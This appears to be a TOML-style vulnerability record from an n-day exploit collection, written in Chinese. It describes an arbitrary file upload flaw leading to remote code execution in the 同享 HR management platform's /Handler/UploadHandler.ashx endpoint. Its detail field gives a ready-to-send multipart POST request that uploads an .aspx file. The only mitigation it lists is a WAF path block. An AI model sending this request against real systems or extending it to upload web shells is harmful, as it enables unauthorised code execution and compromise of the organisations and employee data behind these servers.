vendor = "同享"
name = "同享人力管理管理平台UploadHandler存在任意文件上传漏洞"
type = "RCE"
version = "未知"
path = "/Handler/UploadHandler.ashx"
detail = "POST /Handler/UploadHandler.ashx?folder=Uploadfile2 HTTP/1.1 Host: accept: */* Content-Type: multipart/form-data; boundary=---------------------------123 Content-Length: 226 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close -----------------------------123 Content-Disposition: form-data; name=\"Filedata\"; filename=\"12333.aspx\" Content-Type: text/plain safdsfsfaa -----------------------------123--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
